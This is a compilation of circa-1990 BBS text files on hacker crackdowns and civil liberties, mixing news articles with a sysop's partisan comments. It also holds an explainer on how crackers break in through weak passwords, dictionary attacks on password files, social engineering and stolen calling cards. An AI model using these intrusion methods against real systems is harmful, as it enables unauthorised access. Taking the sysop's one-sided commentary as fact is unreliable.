 publishing a private telephone-company statement in  his electronic
 newsletter; Kapor says that the prosecution may violate freedom of press.
 "The first thing that happens is the government goes around busting a
 bunch of teenagers," Kapor complains," and calls them criminals."  The
 threat, he warns, extends to virtually anyone who links his computer
 to others.

        Law-enforcement officials accuse Kapor of romanticizing crooks who
 are violating the rights of their victims, and most people still think
 that hackers are a bigger threat than the cops.

/* The same 'law-enforcement' (read: police-brutality) officials also hold
   that a student fired first at the Kent State Massacre.               */

        But the crackdown has spurred Kapor and such industry legends as
 Apple Computer cofounder Steve Wozniak to band together behind the new
 generation.  Their goal: to protect the flow of information and innovation
 that helped bring about the personal-computer revolution.

/* Unfortunately, Apple Computers' current top executives are working in the
   opposite direction.  More to come on this.                           */

        Within the next few weeks they will officially announce a new
 foundation, yet unnamed, intended to combat computer phobia and provide
 legal aid for some of those snared in the dragnet.  The computer-rights
 movement has gained support on Capitol Hill, where Sen. Patrick Leahy,
 Democrat of Vermont, has planned upcoming hearings on how far law
 enforcement should go.  While advocating some punishment for lawbreakers,
 Leahy adds, "We cannot unduly inhibit the inquisitive 13-year-old who, if
 left to experiment today, may tomorrow develop the telecommunications or
 computer technology to lead the United States into the 21st century.
 He represents our future and our best hope to remain a technologically
 competitive nation."

/* Interestingly enough, Dr. Timothy Leary (correct me on the spelling) of
   'turn on, tune in, drop out' fame holds the same position.           */

        It's not that Kapor thinks he's defending choirboys.  Although
 some hackers insist they should be able to traipse digitally wherever
 they please, Kapor says that trespassers should be prosecuted - "I don't
 want people breaking in where they don't belong."  But he says the
 zealousness of the investigations is out for proportion to the threat.

/* Somebody should tell this reporter what 'McCarthyism' and 'witch-hunts'
   are.  There always must be an enemy.  Now that the commies aren't the
   'evil empire,' the government is being forced to invent new threats. */

        To Kapor, there is more at stake than keeping a bunch of teenagers
 out of jail.  He cites the case of Craig Neidorf, the University of Missuori
 student indicted after his electronic newsletter, Phrack, featured the
 private telephone-company document.  If the government is right in
 Neidorf's case, says Kapor attorney Terry Gross, The New York Times could
 have had its printing presses confiscated for publishing the Pentagon
 Papers.

/* Read that sentence again.  Carefully.                                */

        "Its very, very clear First Amendment implications should threaten
 all traditional media," says Gross - whose firm, Rabinowitz, Boudin,
 Standard, Krinsky and Lieberman, represented Pentagon Papers leaker Daniel
 Ellsberg.

        Not everyone is singing along with Mitch.  Software companies, long
 angry over "piracy" (passing around bootleg copies of programs), are glad
 to see the authorities cracking down.  Ken Wasch, executive director of
 the Software Publishers Association, calls Kapor a friend, but says, "For
 Mitch to believe that there is a government-sponsored witch hunt going on
 is completely without foundation."

/* I had to have three people pin me while one beat me senseless in order to
   stop laughing after reading this!  This is the same person who (with help
   from [Cr]Apple Computers) is advocating laws in Europe (and soon the USA)
   to OUTLAW all hardware, software, and publications that could in ANY WAY
   aid or instruct a person in breaking copy protection (which is a ridiculous
   concept in the first place) or altering commercial software.  This means no
   Central Points Option Boards. This means that a PC-Magazine article telling
   you how to twiddle a bit would land you in jail.  This means that a copy of
   'Gamemaster,' Copy-II [insert computer type here, e.g. Copy-II-PC], Option
   Board control software, or character editors would be outlawed.      */

        Gail Thackeray, an Arizona assistant attorney general who deals with
 high-tech crime, insists the authorities are being mindful of civil rights.
 She predicts that when the facts come out at the various trials, the cops
 will be vindicated: "Some of these people who are loudest on the bandwagon
 may just slink back into the background."

/* After Men In Black show up with pistols pulled and threaten them.  It's
   happened.                                                            */

        Thackeray dismisses claims that prosecution will shut down legitamite
 computer networks;...

/* It already has.  Large, public, dial-up UNIX boxes have been seized as
   'evidence' and never returned without being used in trials because 6K of
   their 15-megs-a-night of Internet mail happened to be that rewritten E911
   leak.  Interestingly enough, the document, supposedly valued at ~$79K,
   contains mostly public information and certainly NOTHING that would enable
   a so-called 'hacker' to gain access to the system.                   */

 ...she speaks approvingly of one former hacker who told agents that he had
 quit as word spread of the raids.  "That's not, to me, a constitutionally
 suspect chilling effect," she says.  "That's what we in law enforcement
 call a 'deterrent'."

/* I suppose Kent State was a 'deterrent' against free thought. I suppose
   McCarthyism was a 'deterrent' against proposing reform in our corrupt
   government. How stupid does she take us to be?                       */

        If Kapor's stance seems surprising, he's used to surprising
 people.  His 1-2-3 bundle of business tools was an overnight hit, making
 him a multimillionaire.  Once his Lotus Development Corp. became a giant,
 he shocked the industry again by walking away; Lotus, he says, had
 outgrown its innovative beginnings.  "Most of what you do in business is
 business," he explains.  "I'm interested in business as a medium for
 creating products."  He is now creating products again at his new firm,
 Cambridge Mass.-based On Technology.

        Kapor developed the idea for the computer foundation with John
 Perry Barlow, a writer and self-described "professional techno-crank."
 Barlow says hackers typically try to sound more dangerous than they
 really are, a kind of digital vogueing.  He says most live by a "hacker
 ethic" described by a Phrack essay.  The piece tells prospective hackers
 to do no harm, because "The thrill of the hack is not in breaking the
 law, it is in the pursuit of knowledge."  Barlow says if this weren't the
 case, there would be even more damage to computers.

/* This is very true.  If the people out there would use their knowledge for
   'bad,' the Internet would go to pot.  Corporate systems would crash daily
   and NOT because of a root spilling his coffee on a circuitboard.     */

        With the outlines of the organization sketched out, Kapor began
 calling on friends in the industry.  While some have been reluctant,
 there was one instant convert: Apple cofounder Wozniak.  Like Kapor,
 Wozniak walked away from his company when it grew too far past its funky
 beginnings.  He has since put on rock concerts, gone back for his college
 degree and taken stabs at high-tech ventures.  Wozniak says a little
 mischief is important to the quest for knowledge.  He credits his college
 experience building "blue boxes" (devices for making free phone calls)
 with honing his hardware-design skills.  He compares electronic trespass
 to driving a few miles over the speed limit.  There are people who never
 break any such rules, he says, but adds "do you think I'd want my son to
 turn out like that, or marry one?  I'd still support him... but I kinda
 hope he has a a more fun life."  "Woz" pledged to match Kapor's
 contribution, which helped put the initial funding over $150,000.

        Kapor, captain of his high school math team, has thrown in his lot
 with the nerds.  He and his allies are attempting nothing less than to
 keep the ideals of the computer revolution alive.  They hope to turn
 around a public increasingly resentful of computers and the people who
 are adept at using them.  "You've got a lot of people who don't understand
 the present," Barlow says, "and in the absence of understanding, /* and in
 the face of intense government propaganda */ default to fear...The real
 disease here is future shock."  Somebody has to stick up for the pencil-
 necked and the pimply.  Luckily for them, the men who have chosen to do so
 are filthy rich.


                      Great Moments in Mischief
                      =========================
                   [The fun timeline, as promised!]

        The word "hacker" once meant any dedicated programmer; lately it's
 taken on a criminal tone.  Some events that got us from there to here:

 September 1970: John Draper makes free calls with a cereal-box whistle
        that matches AT&T's tones.  Hence his nom de hack: Captain
        Crunch. [Wasn't it Cap'n Crunch?]

1986: The Computer Fraud and Abuse Act passes, toughening police powers
        against hackers.

 February 1990: Four indictments in an alleged scheme authorities say
        endangered 911 service.  They cite a group calling itself "Legion
        of Doom." /* The Feds are trying to slap a ~$130000 fine and several
        years in jail on each of them */
/*
 February 1990: Federal investigators confiscate Knight Lightning's (pub-
        lisher of PHRACK) laser printer as evidence in the E911 trial.
        Somehow I have a feeling that it's sitting on the desk of the local
        sherriff, churning out smut textfiles.  Another item that was seized as
        'evidence' was a story-in-progress that was due in less than a month.
        They marked a Cyberpunk novel for confiscation as well, but overlooked
        it.
*/
 May 1990: Robert T. Morris Jr. is found guilty of setting loose a "worm"
        program that stilled thousands of linked computers in November
        1988.  His sentence includes no jail time.
/*                          ^^^^^^^^^^^^^^^^^^^^^^                      */
 May 1990: Operation Sundevil, one of several antihacker investigations,
        seizes 42 computers and 23,000 floppy disks in 14 cities with four
        arrests.
/*
 June 1990: Government investigators have still refused to give back the systems
        that they seized as [totally irrelevant] 'evidence' in cases that
        never have and never will go to trial.  The few systems that _are_
        returned are very seldom in working order.

 June 1990: Steve Jackson Games is on the verge of going out of business.  When
        the 'public slavedrivers-*, er, SERVANTS' seized their systems they
        also seized work-in-progress (GURPS Cyberpunk RPG modules) and the
        food from the fridge.  Definitely solid evidence there.
*/

                THIS HAS BEEN A PRODUCTION OF HANFORD BBS
        CONSTANTLY STRIVING FOR PUBLIC AWARENESS AND ABOLITION OF
                             AMERICAN APATHY
-------------------------------------------------------------------------------

 Call Hanford Biohazard Processing and Removal Facility - (503) 629-0209
  Sysop: Digital Derelict
   Running: WWIV v4.11
    Over 500 text files online!

--------------

 
 
 


X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

 Another file downloaded from:                               NIRVANAnet(tm)

 Burn This Flag         Zardoz               408-363-9766   V.42bis, 14.4K
 
 &TOTSE                 Jeff Hunter          510-935-5845   9600 HST
 The Salted Slug        Strange              408-454-9368   2400
 realitycheck           Poindexter Fortran   510-527-1662   2400
 Lies Unlimited         Mick Freen           415-583-4102   2400
 My Dog Bit Jesus       Suzanne D'Fault      510-658-8078   2400
 New Dork Sublime       Demented Pimiento    415-566-0126   2400

   Specializing in conversations, obscure information, high explosives,
        arcane knowledge, political extremism, diverse sexuality,
       insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.

      No harassment of callers. We don't want to know who you are,
   where you live, or what your phone number is. We are not Big Brother.

X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
WASHINGTON (AP)-Telephone companies are declaring war on thousands of college 
students,professionals, and even prisoners who get into the telephone network 
illegally and ring up a half billon dollars in unpaid calls a year.

  Companies are changing the software as well as the hardware in their netwoeks 
to try to block calls, and they are offering amnesty programs on college 
campuses for students to fess up and pay up.

  They also are working with federal authorities to prosecute call-sell 
operators who are using stolen authorization codes and electronic devices to 
break into the network and sell calls to all parts of the world at drastically 
dicounted prices.

  "We look at it as a major problem, and it's definately well worth going after 
this half billion dollars," said Rami Abuhamdeh, executive director of the 
industry-sponsored Communucations Fraud Control Association. (CFCA)

  "In any industry, if you don't do anything about it, it's only going to fet 
worse."

  Computer-literate college stuents are among the biggest offenders and their 
campuses are breeding grounds for large-scale theft.

  Authorization codes get passed around quickly, allowing students to phone 
home for free, telephone company security officials say.

  "That's something we're going to have to deal with because college students 
have inquisitive minds and they like to do things like challenge the network,"
said Neal Norman, security manager for AT&T.
  
  MCI officials say they recently pursuaded 1,000 students at North Texas State 
University in Denton, Texas, to turn themselves in and pay about $100,000 for 
the illegal calls they made.

  At American University in Washington, D.C., 400 students turned themselves in 
and are being billed for about $25,000 so far, MCI spokesman John Houser said.

  Computer hackers -- including doctors, lawyers, and some housewives -- who 
search computer files for authorization codes are another problem.

  Abuhamdeh says their heaviest damage is in selling the codes or posting them 
on BBSs.

  The Hackers themselves usually don't make as many calls as ither groups, 
including prisoners, he said.

  "Prisoners have a lot of time on their hands and they're very innovative. And 
unfortunately in a lot of places, they have access to phones continually," 
AT&T's Norman said.

  In on case, Norman said, a prisoner called a hospital, identified himself as 
a doctor and asked to be connect to another number in the hospital. When that 
number answered, he asked to be switched to the hospital operator, whom he 
asked to connect him to an outside line to for a long-distance call.

  Companies are using sophisticated computer technology to identify patterns of 
illegal calling, which are often traced to operations run by "call selllers."

  "They make $2,000 a week selling calls, and that's tax free," said Martin 
Preede, a special agent for corporate security at NY Telephone Co. But He 
warned that phone companies are actively tracking down such operations and 
prosecuting.




Typed in from a local newspaper. Article was written in late April.

Courtesy of The Wiz Kid.
Hackers in the Media, List start: 10/28/92 - Doomsday.

Sneakers, Fall '92
  -- 'mysterious crypto black box that deciphers anything'
WarGames, Spring 1984(5?)
  -- Computer Whiz breaks into Norad, and nearly blows the world up
MacGyver, Spring Episodes, 1990
  -- young computer hacker saves the day by bypassing
security/alarms/doors

Night Court, Old series (90?)
  -- Young computer whiz threatens school records, credit reports, ad
naseum for attention

Batman Returns/Batman
(92, 91 respectively)
  -- Michele Pfeifer (Catwoman) guesses secret access code, computerish
incompetent, Batman taps into everything imaginable -- more fictional
than hackertype.

Lawnmower man (92)
  -- "Someone is hacking the mainframe and putting 3 digit cipher locks
on all outgoing lines, we're cut off from the net!"

Mr. Bogus - Cartoon, Limited syndication WLVI (56 - Boston)
  Mr. Bogus, bleeps into a computer and hunts out a virus, and combats
it.

Duck Tales (Disney Afternoon) 92
  -- Scrouge and other go into the computer to recover his money that has
been moved electronically by the Beagle Boys (Guh)

Weird Science:
  -- Teenage kids, accessing some secret project are able to create a
women -- Far fetched, but the concept is there

[ed: Ok, I'm grasping here... Give me a break]
Bloom County (Syndicated column, name change, Outland)
  -- Oliver 'Technical whiz hacker' does neat-o tricks... Genius.

Teenage Mutant Ninja Turtles
  -- (Syndicated Cartoon, Nationwide) Common 'hacking into computer
themes. Donnatello maybe? I confuse those blasted turtles.

Foxtrot
  -- Instances of main character changes things in school records, blah.



News Shows: 20/20, Dateline NBC, Nightline...
A current affair, Donahue
             TEEN-AGE HACKER
             HAS LESSONS FOR
             COLUMBIA POLICE
 
 
 THE 13 YEAR OLD COLUMBIAN YOUTH'S VOYAGE
          INTO THE WORLD OF COMPUTER PIRACY HAS BEEN AN EYE-OPENING
          EXPERIENCE FOR LOCAL POLICE, WHO SAY THEIR COMPUTER EXPERTISE
          PALES IN COMPARISON TO THE SELF-TAUGHT SKILLS OF THE
          BYTE-SIZE BUCCANEER.
             "I NEVER EVEN TOUCHED ONE OF THESE UNTIL WE GOT THIS ONE,"
          SAID HOWARD COUNTY POLICE LT. MICHAEL    SHIUCHIOLO, HOLDING
          THE KEYBOARD OF THE YOUTH'S CONFISCATED HOME COMPUTER.
             COUNTY POLICE, ACTING ON A TIP FROM AN INFORMANT, ARRESTED
          THE UNIDENTIFIED YOUTH LAST MONTH FOR ALLEGEDLY USING DATA
          SUPPLIED BY COMPUTER PIRATES FROM AROUND THE COUNTRY TO MAKE
          ILLEGAL CREDIT CARD PURCHASES, PLACE FREE LONG-DISTANCE
          TELEPHONE CALLS AND OBTAIN HUNDREDS OF BOOTLEGGED COMPUTER
          PROGRAMS WORTH AS MUCH AS $20,000.
             THE CASE HAS CALLED INTO QUESTION THE ABILITY OF LOCAL'
          POLICE DEPARTMENTS TO INVESTIGATE COMPUTER BANDITRY, WHICH
          SOME EXPERTS CONSIDER THE FASTEST-GROWING CRIME OF THE 1980S.
          IN HOWARD COUNTY, HOME TO THOUSANDS OF WHITE-COLLAR
          PROFESSIONALS WHO WORK IN HIGH-TECH INDUSTRIES, THE POLICE
          WERE CAUGHT COLD.
             AFTER OBTAINING A WARRENT, THE OFFICERS SEARCHED THE
          YOUTH'S COLUMBIA HOME AND SEIZED HIS COMPUTER EQUIPMENT.
          MERCHANDISE ALLEGEDLY PURCHASED WITH THE CREDIT CARD NUMBERS
          AND AT LEAST 80 COMPUTER DISCS ON WHICH DATA WAS STORED. BUT
          NONE OF THE OFFICERS KNEW HOW TO OPERATE THE COMMODORE 64, A
          MODEL THAT SELLS FOR ABOUT $179, EVEN THOUGH IT IS CONSIDERED
          AN EASY-TO-USE MODEL, CHIUCHIOLO SAID.
             COUNTY POLICE HAD TO CALL IN AN EXPERT FROM THE FBI TO
          GIVE THEM A CRASH COURSE IN COMPUTER PROGRAMMING. THE YOUTH,
          WHO AUTHORITIES SAID WAS COOPERATING WITH POLICE, HAS GIVEN
          SEVERAL DEMONSTRATIONS, CHIUCHIOLO SAID.
             LOCAL POLICE ARE RESPONSIBLE FOR INVESTIGATING SUCH CASES.
          THE FBI PROVIDES ONLY TECHNICAL ASSISTANCE, AN FBI SPOKESMAN
          SAID.
             THE SECRET SERVICE IS INVOLVED IN THIS CASE, BUT ONLY TO
          INVESTIGATE ALLEGED CREDIT CARD FRAUD, SAID SPECIAL AGENT
          JAMES    DE DETTE.
             RECENTLY, IN A CONFERENCE ROOM AT POLICE HEADQUARTERS,
          SHIUCHIOLO DEMONSTRATES THE YOUTH'S EQUIPMENT, GINGERLY
          HUNTING AND PECKING ON THE COMPUTER KEYBOARD TO CALL UP
          PROGRAMS.
             HE SAID IT MAY BE WEEKS BEFORE ALL OF THE INFORMATION
          STORED ON THE COMPUTER DISCS IS EXAMINED.
             "A LOT OF THEM ARE PROGRAMS MADE UP BY OTHER COMPUTER
          HACKERS. HE EVEN DESIGNED A COMPUTER GAME HIMSELF WHICH IS
          REALLY QUITE GOOD," THE OFFICER SAID.
             THE YOUTH, WHO IS DESCRIBED BY POLICE AS AN OTHERWISE
          "TYPICAL" SUBURBAN TEEN-AGER, GOT THE HOME COMPUTER LAST YEAR
          AND READ DOZENS OF BOOKS AND MAGAZINES ON THE SUBJECT.
             FIVE MONTHS AGO, HE ADDED A DISK DRIVE UNIT, WHICH CAN
          RETRIEVE INFORMATION STORED ON SMALL DISCS INSERTED INTO THE
          MACHINE.
             AFTER THAT, POLICE SAID, HE EMBARKED INTO THE WORLD OF
          COMPUTER PIRACY, APPARENTLY LINKING WITH 15 TO 20 COMPUTER
          HACKERS AROUND THE COUNTRY. THE HACKERS, KNOWN BY CODE NAMES
          SUCK AS "THE KERNEL" AND "THE BANDIT," EXCHANGED INFORMATION
          AND PROGRAMS THROUGH SO-CALLED COMPUTER "BULLETIN BOARDS."
             STORED ON THE YOUTH'S COLLECTION OF DISCS WERE SCORES OF
          ALLEGEDLY PIRATED GAMES SUCH AS THE FARMILIAR "DONKEY KONG"
          AND "SPACE INVADERS," POLICE SAID. THEY ALSO FOUND ILLEGAL
          PROGRAMS THAT CAL PLACE FREE LONG-DISTANCE CALLS ON AT&T'S
          OWN CORPORATE TELEPHONE LINES, SIMULATE THE TONES OF
          COIN-OPERATED PHONES OR GET ACCESS TO SPRINT, MCI AND OTHERS
          INDEPENDENT PHONE COMPANIES, SHUICHIOLO SAID.
             TELEPHONE COMPANY OINVESTIGATORS WATCHED IN AMAZEMENT AS
          THE YOUTH EFFORTLESSLY PLACED A CALL TO LONDON DURING ONE OF
          HIS RECENT DEMONSTRATIONS, THE OFFICER SAID.
             THE TEEM-AGER ALSO HAD A PROGRAM TO CONDUCT "DRITY 
          DIALING," A TERM USED FOR A COMPUTER THAT DIALS EVERY
          TELEPHONE NUMBER IN A GIVEN EXCHANGE IN SEARCH OF OTHER
          COMPUTERS WITH WHICH HIS COULD BE CONNECTED, POLICE SAID.
             DIRTY DIALING WAS HIGHLIGHTED IN THE MOVIE "WAR GAMES," IN
          WHICH A TEEN-AGE COMPUTER WIZARD INADVERTENTLY GAINS ACCESS
          TO DEFENSE DEPARTMENT COMPUTERS AND ALMOST STARTS WORLD WAR
          III.

                      HOW `CRACKERS' CRACK                                      
                       by Rory J. O'Connor                                      
                  Mercury News Computing Editor                                 
                                                                                
     Police, prosecutors and most of the press call them                        
"hackers." Computer cognoscenti prefer the term "crackers."                     
                                                                                
     Both sides are talking about the same people, typically                    
young men, whose fascination with computers leads them to gain                  
access to computers where they don't belong.                                    
                                                                                
     A few crackers make headlines, like Robert T. Morris Jr.,                  
son of a top computer security expert for the supersecret                       
National Security Agency, who let loose a "worm" program on a                   
national network of university, research and government computers               
in 1988.                                                                        
                                                                                
     There are also notorious crackers like Kevin Mitnick, who                  
was under investigation at the age of 13 for illegally obtaining                
free long-distance phone calls and was sentenced to prison in                   
1989 for computer break-ins.                                                    
                                                                                
     Then there are legions of far more ordinary crackers who                   
simply use their knowledge of computers to "explore" intriguing                 
corporate or government computers or simply to go for the                       
electronic equivalent of a joy ride and impress their friends.                  
                                                                                
     But they all share something: an air of mystery. How do they               
do it?                                                                          
                                                                                
     At a recent conference on computer freedom and privacy,                    
computer expert Russell L. Brand gave a four-hour lecture on the                
inner workings of computer cracking.                                            
                                                                                
     His basic message: Cracking is not as hard as it seems to an               
outsider, and it often goes undetected by legitimate users of                   
"cracked" computers.                                                            
                                                                                
     "Just because you don't see a problem is no reason to think                
a problem hasn't occurred," Brand said. "Generally it's a month                 
to six weeks before (operators) notice anything happened and                    
usually because the cracker accidentally broke something."                      
                                                                                
     Home computers aren't in danger from crackers because they                 
aren't accessible to outsiders--and because they aren't                         
interesting to crackers. Instead, they target mainframes and                    
minicomputers that support many users and are connected to                      
telephone lines and large networks.                                             
                                                                                
     Understanding how crackers work and what security weaknesses               
they exploit can help system managers prevent many break-ins,                   
Brand said. And the biggest problem is carelessness.                            
                                                                                
     "When I started looking at break-ins, I had the assumption                 
that technical problems were at fault," he said. "But the problem               
is human beings."                                                               
                                                                                
     The "Cracker": Most crackers are not bent on stealing either               
money or secrets but will target a particular computer for entry                
because of the bragging rights they will enjoy with fellow                      
crackers once they prove they broke in. Typically, the computer                 
belongs to a corporation or the government and is considered in                 
cracking circles to be hard to penetrate. Often, it is connected                
to the nationwide NSFNet computer network.                                      
                                                                                
     The attack: Crackers can attack the target computer from                   
home, using a modem and a telephone line. Or they can visit a                   
publicly accessible terminal room, like one on a college campus,                
using the school's computer to attack the target through a                      
network. At home, the cracker works undisturbed and unseen for                  
hours, but phone calls might be traced.                                         
                                                                                
     The resources: If the target computer is nearby, the cracker               
may look through the owner's trash for valuable information, a                  
practice called "dumpster diving." Discarded printouts, manuals                 
or other paper may contain lists of accounts, some passwords, or                
technical data more sophisticated crackers can exploit.                         
                                                                                
     The target: The easiest way to enter the target is with an                 
account name and its password. Passwords are often the weakest                  
link in a computer's security system: Many are easy to guess, and               
some accounts have no password at all. Sophisticated crackers use               
their personal computers to quickly try thousands of potential                  
passwords for a match.                                                          
                                                                                
     The cover: To make calls from home harder to trace, crackers               
might use stolen telephone credit-card numbers to place a series                
of calls through different long-distance carriers or corporate                  
switchboards before calling the target computer's modem.                        
                                                                                
     The way in: Many crackers take advantage of "holes" in the                 
operating system, the software that controls the basic operations               
of the machine. The holes are like secret doors that either let                 
crackers make their own "super" accounts or just bypass accounts                
and passwords altogether. Five holes in the Unix operating system               
account for the bulk of computer break-ins--yet many                            
installations have failed to patch them.                                        
                                                                                
     The network: Most large computers are connected to several                 
others through networks, a chief point of attack. Computers erect               
barriers to people but often completely trust other computers, so               
attacking a computer through another computer on the network can                
be easier than attacking it with a personal computer and a modem.               
                                                                                
     Ill-used passwords let many pass                                           
                                                                                
     Passwords are the security linchpin for most computer                      
systems. But these supposedly secret keys to computer access are                
easily obtained by a determined cracker.                                        
                                                                                
     The main reason: Users and system managers often are so                    
careless with passwords that they are as easy to find as a door                 
key left under the welcome mat.                                                 
                                                                                
     Part of the problem is the proliferation of computers and                  
computerlike devices such as automated teller machines, all of                  
which require passwords or personal identification numbers. Many                
people must now remember half a dozen or more such secret codes,                
encouraging them to make each one short and simple.                             
                                                                                
     Often, that means making their passwords the same as their                 
account name, which in turn is often the user's own first or last               
name. Such identical combinations are called "Joe" accounts, and                
according to computer expert Russell L. Brand, they are "the                    
single most common cause of password problems in the world."                    
                                                                                
     These `secret' keys to computer access are easily obtained                 
by a determined cracker. The main reason: Users and system                      
managers often are so careless with passwords that they are as                  
easy to find as a key left under the welcome mat.                               
                                                                                
     Knowing there are Joes, a cracker can simply try a few dozen               
common English names with a reasonable chance that one will work.               
Armed with an easily obtained company directory of employees, the               
task can be even easier.                                                        
                                                                                
     Joe accounts also crop up when the system manager creates an               
account for a new employee, expecting that the user will                        
immediately change the given password from his or her name to                   
something else. But users often fail to make the change or aren't               
told how. Sometimes, they never use the account at all, providing               
not only easy access for the cracker but an account where the                   
owner won't notice any illicit activity.                                        
                                                                                
     Even if crackers can't find a "Joe" on the computer they                   
want to enter, there are several other common ways for them to                  
find a password that will work:                                                 
                                                                                
     - Many systems have accounts with no passwords or have                     
accounts for occasional visitors to use where the ID and password               
are both GUEST.                                                                 
                                                                                
     - Outdated operator's manuals retrieved from the trash often               
list the account name and standard password provided by the                     
operating system for use by maintenance programmers. Although it                
can and should be changed, the password seldom is.                              
                                                                                
     - "Social engineering"--in effect, persuading someone,                     
usually by telephone, to divulge account names, passwords or                    
both--is a common ploy used by crackers.                                        
                                                                                
     - Crackers are sometimes able to obtain an encrypted list of               
passwords for a target computer, discarded by the owners who                    
mistakenly believe the coded words aren't useful to crackers.                   
While it's true they are difficult to decode, it is easy for a                  
cracker to use a personal computer to take a potential password                 
and encode it. Because most passwords are ordinary English words,               
crackers can simply run a personal computer program to encode the               
contents of an electronic dictionary and identify any entries                   
that match passwords on the coded list.                                         
                                                                                
     - In another form of deception, crackers set up public                     
bulletin board systems whose real purpose is to snag passwords.                 
Because many people tend to use the same password for all their                 
computer accounts, the cracker can simply wait until someone who                
has an account on the target computer also sets up an account on                
the bulletin board. The cracker then reads the password and tries               
it on the target system.                                                        
                                                                                
     While individual users can't delete dormant accounts from                  
their computers or keep an eye on the trash, they can be                        
intelligent about what passwords they use. Brand suggests users                 
choose a short phrase that's easy for them to remember and then                 
use the first two letters of each word as the password. As added                
protection, users who are able should mix uppercase and lowercase               
letters in their passwords or use a punctuation mark in the                     
middle of the word.--Rory J. O'Connor                                           
                                                                                
     The rights of bits                                                         
                                                                                
     Constitutional scholar Laurence H. Tribe, widely considered                
the first choice for any Supreme Court vacancy that might arise                 
under a Democratic administration, proposed a fairly radical idea               
recently: a constitutional amendment covering computers.                        
                                                                                
     Tribe's proposal for a 27th Amendment would specifically                   
extend First and Fourth Amendment protections to the rapidly                    
growing and increasingly pervasive universe of computing. Those                 
rights would be "construed as fully applicable without regard to                
the technological method or medium through which information                    
content is generated, stored, altered, transmitted or                           
controlled," in the words of the proposed amendment.                            
                                                                                
     I am not a constitutional scholar, but I have to believe                   
that what's needed is not a change in the Constitution, but                     
instead a change in the thinking of judges in particular and the                
public in general.                                                              
                                                                                
     Tribe acknowledges that he doesn't take amendments lightly,                
pointing to the ridiculous brouhaha over a flag-burning amendment               
as an example of what not to do to the basic law of the land. But               
like many people who are more deeply involved in the world of                   
computers, Tribe sees the issue of civil liberties in an                        
information society as a crucial one.                                           
                                                                                
     The question is not whether the civil liberties issue is                   
serious enough to be addressed by some fundamental legal change.                
The question is really how to get people to see that                            
communicating with a computer is speech, and that to search a                   
computer and seize data is the same as searching a house and                    
seizing the contents of my filing cabinet.                                      
                                                                                
     People seem to have trouble making these connections when                  
computers are involved, even though they wouldn't have trouble                  
recognizing a private telephone conversation as protected speech.               
Yet most telephone calls in this country are, at some time in                   
their transmission, nothing more than a stream of computer bits                 
traveling between sophisticated computers.                                      
                                                                                
     Admittedly, computers do make for some complications where                 
things like search and seizure are concerned.                                   
                                                                                
     Let's say the FBI gets a search warrant for a computer                     
bulletin board, looking for a specific set of messages about an                 
illegal drug business. Because a single hard disk drive on a                    
bulletin board system can contain thousands of messages from                    
different users, the normal method for police will be to take the               
whole disk, and probably the computer as well, back to the lab to               
look for the suspect messages.                                                  
                                                                                
     Of course, that exposes other, supposedly confidential                     
messages to police scrutiny. It also interrupts the legitimate                  
operation of what is, in effect, an electronic printing press.                  
                                                                                
     Certainly, in the case of a real printing press that used                  
paper, such police activity would never be allowed. But a                       
computer is involved here, which to some appears to make the                    
existing rules inapplicable.                                                    
                                                                                
     But in a case like this, we don't need a new amendment, just               
the proper application of the Bill of Rights.                                   
                                                                                
     As a more practical matter, the chances of amending the                    
Constitution are slight. It was the intent of the framers to make               
the task difficult, to prevent just such trivial things as                      
flag-burning amendments from being tacked onto the document. Even               
the far more substantial Equal Rights Amendment did not survive                 
the rocky road from proposal to adoption. I doubt Tribe's                       
amendment would fare any better.                                                
                                                                                
     Tribe says he hopes his proposal will spur serious                         
discussion of civil rights in the information age, and I suspect                
that is his real--and laudable--motive.                                         
                                                                                
     I'm not dead set against amending the Constitution if that's               
what it takes to extend the Bill of Rights to computing. I just                 
believe that Americans are capable of figuring out that we don't                
need it.                                                                        
                                                                                


         
CGA SOFTWARE PRODUCTS GROUP ON COMPUTER CRIME 
 
    INTERNAL COMPUTER CRIME PROVES GREATER THREAT THAN 'HACKERS'
    NEW YORK, July 17 /PRNewswire/ -- For every outsider who accesses 
Pentagon telephone numbers or makes fraudulent credit card purchases, 
like the seven New Jersey teenagers arrested recently, it is
estimated that far greater numbers of disgruntled or dishonest
employees damage their employers' computer systems internally every 
day.
    "Teenage 'hackers' are just the tip of the computer crime 
iceberg," says Carol Molloy, a computer security specialist with CGA
Software Products Group, Holmdel, N.J.  "These computer crimes get
the spotlight because the perpetrators get caught and the victims are 
willing to prosecute."
    More insidious data fraud and malicious damage occurs inside
corporations than any hacker ever committed, Molloy continues.
"Employees have far greater access to sensitive information, and many 
times are so well acquainted with procedures and security features
that they leave no trail at all," she adds.  "Unhappy employees can 
leave a programming 'time bomb' in a computer that causes trouble 
long after they are fired or leave for another job."
    Carelessness, rather than malice, often causes even more
problems, according to Molloy.  "Many computer security systems are 
based on passwords, and people can be very lax about protecting 
them."
    Employee computer crimes, however, receive far less attention 
than outside break-ins, Molloy says, because victimized organizations 
are unwilling to publicize the matter through arrest and prosecution. 
"Revealing damage from internal sources doesn't do much for a 
company's image," she says. 
    "Customers, corporations feel, will start to wonder about just
how secure relevant information may be and may decide to go 
elsewhere.  Also, insurance premiums often go up afte2 a theft is 
revealed."
    The question facing data processing and information managers is 
not whether a security system should be installed, but how to go
about it, says Molloy.  "Many organizations believe that security is
solely the concern of the managers," she says.  "They don't realize 
that implementing security requires extensive internal support."
    Security systems also demand ongoing maintenance, she says. 
"Just installing the system doesn't mean data is secure from then 
on," she points out.

UPI Dmestic News Wire
Wednesday July 17, 1985
 
      More may be charged in ``hacker'' ring, prosecutor says 
	   NEW BRUNSWICK, N.J. (UPI) _ More people may be charged with using 
home computers to make free long-distance calls and reportedly try to 
break into Pentagon computers, a prosecutor said Wednesday. 
	   Meanwhile, the executive director of the state chapter of the 
American Civil Liberties Union charged the Middlesex County Prosecutor's
Office with ``trampling'' on the rights of one of the seven youths
charged in the scheme Tuesday.
	   The youths used their computers and electronic ``bulletin boards''
to exchange information on computer codes, including some that would
cause communications satellites to ``change position'' and possibly 
interrupt intercontinental communications, Middlesex County Prosecutor
Alan Rockoff said.
	   ``Though it may sound like a copycat of (the movie) `WarGames,' 
things like this are happening in our society,'' Rockoff said, accusing 
the youths of obtaining thousands and ``possibly millions'' of dollars
in telephone and informational services.
